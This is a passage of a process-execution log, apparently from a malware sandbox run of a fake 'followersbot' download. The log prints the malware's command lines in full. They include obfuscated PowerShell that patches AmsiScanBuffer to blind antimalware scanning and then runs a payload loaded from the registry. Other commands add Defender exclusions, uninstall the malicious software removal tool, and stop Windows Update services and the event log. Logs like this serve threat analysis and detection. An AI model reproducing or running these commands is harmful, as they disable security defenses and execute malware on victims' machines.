tion.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+'l'+'e'+''+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:erecUyBKkUxD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cgvWXsDCHZbLGT,[Parameter(Position=1)][Type]$bXKWGCdfKN)$ChuGcCDErKR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'fl'+'e'+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'mor'+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+'C'+'la'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$ChuGcCDErKR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+'Na'+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cgvWXsDCHZbLGT).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ChuGcCDErKR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+'g,'+'N'+'ew'+'S'+''+[Char](108)+'ot'+','+'V'+'i'+'r'+'t'+''+'u'+''+[Char](97)+'l',$bXKWGCdfKN,$cgvWXsDCHZbLGT).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $ChuGcCDErKR.CreateType();}$ZrqQNGUtvCJil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+'sa'+'f'+'e'+'N'+'a'+[Char](116)+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$UyIwMnRWFMetix=$ZrqQNGUtvCJil.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TPRIERKWTPoyHazJIDh=erecUyBKkUxD @([String])([IntPtr]);$zTGJYCarGFeLJUMHYnbjGP=erecUyBKkUxD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OPuhQtqlaYd=$ZrqQNGUtvCJil.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+'2'+'.'+'d'+''+'l'+'l')));$XEcoJPRbXlTNgs=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$kqwYXhPMqdADFvAjN=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TLCpCfA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XEcoJPRbXlTNgs,$TPRIERKWTPoyHazJIDh).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$PMQjRqMgBzukPdxFW=$UyIwMnRWFMetix.Invoke($Null,@([Object]$TLCpCfA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+'f'+'e'+[Char](114)+'')));$lhgbXNAFkV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,4,[ref]$lhgbXNAFkV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PMQjRqMgBzukPdxFW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,0x20,[ref]$lhgbXNAFkV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+'l'+[Char](101)+'r'+'s'+''+[Char](116)+''+'a'+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1eaf5f63-d604-464a-bcac-c2536bd526c0}
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5bacf96c-67db-4c19-9a07-6b84bce6b458}
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5060 /prefetch:2
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
"C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
"C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "HIUOFKBL"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:jsBBwFSiMSOA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XuIAgtFPvYHavm,[Parameter(Position=1)][Type]$MKdDtJgvOg)$PfHYSRNxgZY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+''+'d'+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+'mory'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+'P'+'u'+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+'Ans'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+'o'+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$PfHYSRNxgZY.DefineConstructor('R'+'T'+'Speci'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XuIAgtFPvYHavm).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$PfHYSRNxgZY.DefineMethod(''+[Char](73)+''+'n'+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+'i'+''+'r'+''+[Char](116)+''+'u'+'al',$MKdDtJgvOg,$XuIAgtFPvYHavm).SetImplementationFlags('Ru'+'n'+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $PfHYSRNxgZY.CreateType();}$kOKbJiaYMLkQT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+'3'+'2'+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$rQBPZBFvyUurXj=$kOKbJiaYMLkQT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c,S'+'t'+''+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EVZUuzjgWrLikZEaeyU=jsBBwFSiMSOA @([String])([IntPtr]);$orpEguWPHkXPZXrXjbVVBO=jsBBwFSiMSOA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IOkfBEGHQYW=$kOKbJiaYMLkQT.GetMethod(''+'G'+'e'+'t'+''+'M'+'o'+'d'+'ul'+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$rUlkBNhpIGipZg=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'r'+[Char](97)+'ry'+[Char](65)+'')));$ofwiIbrtKmiJKaSTR=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$pHaTkJQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUlkBNhpIGipZg,$EVZUuzjgWrLikZEaeyU).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$ASBwPxmhZsbsjPPRa=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$pHaTkJQ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ewTJZjpilC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,4,[ref]$ewTJZjpilC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ASBwPxmhZsbsjPPRa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,0x20,[ref]$ewTJZjpilC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+[Char](101)+'r'+'s'+'t'+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:iDHfkoMYkNLb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QsmjiEJnYbJzNN,[Parameter(Position=1)][Type]$YWzTSnRgNX)$DilHVAVClKq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+'ted'+'D'+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'dul'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+'ut'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DilHVAVClKq.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+'i'+''+'a'+'lN'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'ub'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QsmjiEJnYbJzNN).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$DilHVAVClKq.DefineMethod(''+[Char](73)+''+'n'+''+'v'+'o'+'k'+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$YWzTSnRgNX,$QsmjiEJnYbJzNN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $DilHVAVClKq.CreateType();}$ycRQcpyqZDPil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+'fe'+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+'s');$KkyKndUTItPXvG=$ycRQcpyqZDPil.GetMethod(''+'G'+'e'+[Char](116)+'Pro'+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'ess',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+''+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UVbndFTogdwGxvFnyAt=iDHfkoMYkNLb @([String])([IntPtr]);$zCwhPmYmctrvPRsuRzyVxM=iDHfkoMYkNLb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uHiiOMqiOqk=$ycRQcpyqZDPil.GetMethod('G'+[Char](101)+'t'+[Char](77)+'od'+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+'l'+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$QyKHXnkBaPmncH=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$XcLbDrsjcythStgYh=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$VwTyIoZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyKHXnkBaPmncH,$UVbndFTogdwGxvFnyAt).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$ahOoZlrjRInzsvYNc=$KkyKndUTItPXvG.Invoke($Null,@([Object]$VwTyIoZ,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QHEEOMZuNl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,4,[ref]$QHEEOMZuNl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ahOoZlrjRInzsvYNc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,0x20,[ref]$QHEEOMZuNl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+'W'+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+'ialers'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{844601dd-43a6-4ada-ac04-3f4917639d60}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{41a3914e-4c27-4356-b8f7-21113d07cebe}
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 480 -p 5688 -ip 5688
